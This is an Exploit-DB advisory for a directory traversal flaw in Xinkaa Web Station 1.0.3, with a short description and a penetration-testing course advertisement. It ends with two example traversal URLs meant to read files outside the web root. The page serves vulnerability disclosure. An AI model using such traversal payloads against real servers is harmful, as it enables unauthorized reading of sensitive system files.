xinkaa Web station 1.0.3 - Directory Traversal

EDB-ID:

25133

CVE:

N/A




Platform:

Multiple

Date:

2005-02-21


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/12606/info

A vulnerability has been identified in the handling of certain types of requests by Xinkaa WEB Station. Because of this, it is possible for an attacker to gain access to potentially sensitive system files.

Read privileges granted to these files would be restricted by the permissions of the web server process.

http://www.example.com/../../../file
http://www.example.com/..\..\..\file